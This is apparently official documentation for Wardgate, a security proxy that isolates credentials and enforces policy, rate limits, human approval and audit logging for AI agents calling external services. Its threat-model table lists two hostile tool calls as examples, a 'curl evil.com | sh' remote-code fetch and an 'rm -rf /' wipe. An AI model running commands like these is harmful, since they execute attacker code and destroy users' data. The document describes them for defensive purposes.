Wardgate Security Architecture¶

This document explains how Wardgate protects your credentials and controls AI agent access to external services.

Overview¶

Wardgate is a security proxy that sits between AI agents and external services. It provides:

Credential Isolation - Agents never see real credentials
Access Control - Fine-grained rules for what agents can do
Conclaves - Isolated remote execution environments for agent tool calls
Audit Logging - Complete record of all agent activity
Approval Workflows - Human-in-the-loop for sensitive operations
Rate Limiting - Prevent runaway or abusive behavior

Threat Model¶

What We Protect Against¶

Threat	How Wardgate Helps
Credential exposure in prompts	Credentials never reach the agent
Prompt injection attacks	Agent can only perform allowed actions
Rogue agent behavior	All requests logged and rate-limited
Data exfiltration	Policies restrict what data can be accessed
Sensitive data in responses	Response filtering blocks or redacts OTP codes, API keys, etc. -- including SSE streams
Accidental destructive actions	Require approval for sensitive operations or block them
SSRF via dynamic upstreams	Agent-provided upstream URLs validated against allowlist with scheme, host, and path checks
Tool call hijacking (e.g., `rm -rf /`, `curl evil.com \\| sh`)	Conclaves isolate execution and evaluate each command against policy

What We Don't Protect Against¶

Compromised Wardgate server / host (credentials live here)
Malicious configuration (garbage in, garbage out)
Side-channel attacks on the gateway itself
Social engineering of human approvers

Security Principles¶

1. Defense in Depth¶

Multiple layers protect your credentials:

┌─────────────────────────────────────────────────┐
│  Agent Environment                              │
│  • No credentials                               │
│  • Can only reach Wardgate                      │
└────────────────────┬────────────────────────────┘
                     │ Agent authenticates with its own key
                     ▼
┌─────────────────────────────────────────────────┐
│  Wardgate                                       │
│  • Validates agent identity                     │
│  • Evaluates policy rules                       │
│  • Rate limits requests                         │
│  • Validates dynamic upstream targets           │
│  • Filters sensitive data from responses/SSE    │
│  • Logs everything                              │
└────────────────────┬────────────────────────────┘
                     │ Wardgate injects real credentials
                     ▼
┌─────────────────────────────────────────────────┐
│  External Service (Todoist, Gmail, etc.)        │
└─────────────────────────────────────────────────┘

2. Least Privilege¶

Agents only get access to what they need:

Define specific endpoints (not "all APIs")
Restrict methods (GET only, no DELETE)
Limit paths (only /tasks, not /admin)
Time-bound access (business hours only)
Dynamic upstreams limited to allowlisted host patterns
Response filtering removes sensitive data before it reaches the agent

3. Explicit Over Implicit¶

Nothing happens automatically:

Agents must explicitly use Wardgate
Default policy is deny
Sensitive actions require human approval
All decisions are logged

4. Credential Separation¶

Credentials never leave the gateway:

Stored in environment variables on gateway only
Injected into requests at the last moment
Never included in logs or error messages
Never exposed via any API

Architecture Components¶

Request Flow¶

1. Agent sends request to Wardgate
   ┌─────────────────────────────────────────────┐
   │ GET /todoist-api/tasks                      │
   │ Authorization: Bearer <agent-key>           │
   └─────────────────────────────────────────────┘

2. Wardgate validates agent identity
   ┌─────────────────────────────────────────────┐
   │ Is this a valid agent key? ──► Yes          │
   └─────────────────────────────────────────────┘

3. Wardgate evaluates policy rules
   ┌─────────────────────────────────────────────┐
   │ Rule 1: GET /tasks* → allow    ──► Match!   │
   │ Rule 2: DELETE → deny                       │
   │ Rule 3: * → ask                             │
   └─────────────────────────────────────────────┘

4. Check rate limits
   ┌─────────────────────────────────────────────┐
   │ Agent has made 5/100 requests this minute   │
   │ ──► Under limit, proceed                    │
   └─────────────────────────────────────────────┘

5. Resolve upstream target
   ┌─────────────────────────────────────────────┐
   │ Static upstream from config?       ──► Yes  │
   │ Or: X-Wardgate-Upstream header?             │
   │   Validate against allowed_upstreams globs  │
   └─────────────────────────────────────────────┘

6. Inject credentials and forward
   ┌─────────────────────────────────────────────┐
   │ GET https://api.todoist.com/rest/v2/tasks   │
   │ Authorization: Bearer <real-api-key>        │
   └─────────────────────────────────────────────┘

7. Filter response and return
   ┌─────────────────────────────────────────────┐
   │ Scan for sensitive data (OTPs, API keys)    │
   │ SSE streams: filter per-message in realtime │
   │ Action: block, redact, or pass through      │
   └─────────────────────────────────────────────┘

8. Log
   ┌─────────────────────────────────────────────┐
   │ Log: agent=myagent endpoint=todoist-api     │
   │       method=GET path=/tasks decision=allow │
   │       status=200 duration=145ms             │
   └─────────────────────────────────────────────┘

Policy Engine¶

The policy engine evaluates rules in order. First match wins.

rules:
  - match: { method: GET, path: "/tasks*" }
    action: allow
    rate_limit: { max: 100, window: "1m" }

  - match: { method: POST, path: "/tasks" }
    action: allow
    time_range:
      hours: ["09:00-17:00"]
      days: ["mon", "tue", "wed", "thu", "fri"]

  - match: { method: DELETE }
    action: deny
    message: "Deletion not permitted"

  - match: { method: "*" }
    action: ask

Credential Vault¶

Credentials are stored in environment variables:

# .env file (on gateway only, never shared with agents)
WARDGATE_CRED_TODOIST_API_KEY=abc123...
WARDGATE_CRED_GOOGLE_OAUTH_TOKEN=xyz789...

The vault: - Reads credentials from environment at startup - Never exposes credentials via any API - Logs credential access (not values) for audit - Supports credential rotation without restart

Audit Logging¶

Every request is logged as structured JSON:

{
  "ts": "2026-02-03T10:30:00Z",
  "request_id": "req_abc123",
  "agent": "my-agent",
  "endpoint": "todoist-api",
  "method": "GET",
  "path": "/tasks",
  "decision": "allow",
  "upstream_status": 200,
  "duration_ms": 145
}

Logs capture: - Who (agent ID) - What (method, path, endpoint) - When (timestamp) - Decision (allow/deny/ask) - Outcome (upstream status, duration)

Logs do NOT capture: - Request/response bodies (privacy) - Credential values - Sensitive headers

Approval Workflow¶

For sensitive operations, Wardgate can require human approval:

1. Agent requests DELETE /tasks/123
2. Policy matches: action: ask
3. Wardgate sends notification (Slack/webhook)
   ┌─────────────────────────────────────────────┐
   │ 🔔 Approval Required                        │
   │                                             │
   │ Agent: my-agent                             │
   │ Action: DELETE /tasks/123                   │
   │ Endpoint: todoist-api                       │
   │                                             │
   │ [Approve] [Deny]                            │
   └─────────────────────────────────────────────┘
4. Human clicks Approve or Deny
5. Wardgate continues or blocks the request
6. On timeout → default deny

Deployment Architecture¶

Recommended Setup¶

┌────────────────────────────────────────────────┐
│              Private Network                   │
│                                                │
│   ┌──────────────┐       ┌──────────────┐      │
│   │  Agent VPS   │       │ Gateway VPS  │      │
│   │              │       │              │      │
│   │  • AI Agent  │──────▶│  • Wardgate  │─────▶ Internet
│   │  • No creds  │       │  • Has creds │      │
│   └──────────────┘       └──────────────┘      │
│                                                │
└────────────────────────────────────────────────┘

Network Isolation¶

Gateway only accessible from private network
Firewall blocks direct internet access from agent
All external traffic must go through gateway
WireGuard or similar VPN for secure communication

Gateway Hardening¶

Minimal attack surface (single binary)
No agent code runs on gateway
Credentials encrypted at rest
Regular security updates

Best Practices¶

1. Different host¶

Put the gateway on a different host than the agent. This is the easiest way to isolate the agent from the gateway.

┌────────────────────────────────────────────────┐
│              Private Network                   │
│                                                │
│   ┌──────────────┐       ┌──────────────┐      │
│   │  Agent VPS   │       │ Gateway VPS  │      │
│   │              │       │              │      │
│   │  • AI Agent  │──────▶│  • Wardgate  │─────▶ Internet
│   │  • No creds  │       │  • Has creds │      │
│   └──────────────┘       └──────────────┘      │
│                                                │
└────────────────────────────────────────────────┘

2. Start Restrictive¶

Begin with deny-all, then add specific allows:

rules:
  - match: { method: GET, path: "/tasks" }
    action: allow
  - match: { method: "*" }
    action: deny

3. Use Rate Limits¶

Prevent runaway agents:

rules:
  - match: { method: GET }
    action: allow
    rate_limit: { max: 100, window: "1m" }

4. Require Approval for Writes¶

Be cautious with state-changing operations:

rules:
  - match: { method: GET }
    action: allow
  - match: { method: POST }
    action: ask
  - match: { method: DELETE }
    action: deny

5. Time-Bound Access¶

Limit when agents can operate:

rules:
  - match: { method: "*" }
    action: allow
    time_range:
      hours: ["09:00-18:00"]
      days: ["mon", "tue", "wed", "thu", "fri"]

6. Use Conclaves for Tool Calls¶

Isolate agent command execution in conclaves with per-conclave policy rules:

conclaves:
  code:
    description: "Code repository"
    key_env: WARDGATE_CONCLAVE_CODE_KEY
    rules:
      - match: { command: "rg" }
        action: allow
      - match: { command: "git", args_pattern: "^(status|log|diff)" }
        action: allow
      - match: { command: "*" }
        action: deny

See Conclaves for details.

7. Monitor Audit Logs¶

Regularly review agent activity: - Look for unusual patterns - Check for denied requests - Verify approval decisions

Comparison with Alternatives¶

Approach	Credentials Exposure	Access Control	Audit
Direct API access	Agent has full credentials	None	None
Environment variables	Agent sees credentials	None	None
Built-in agent permissions	Agent sees credentials	Yes, but agent-controlled	Varies
Wardgate	Never exposed	Gateway-enforced	Complete

Future Security Enhancements¶

Response filtering (redact sensitive data)
Anomaly detection (unusual patterns)
Multi-gateway redundancy
Hardware security module (HSM) integration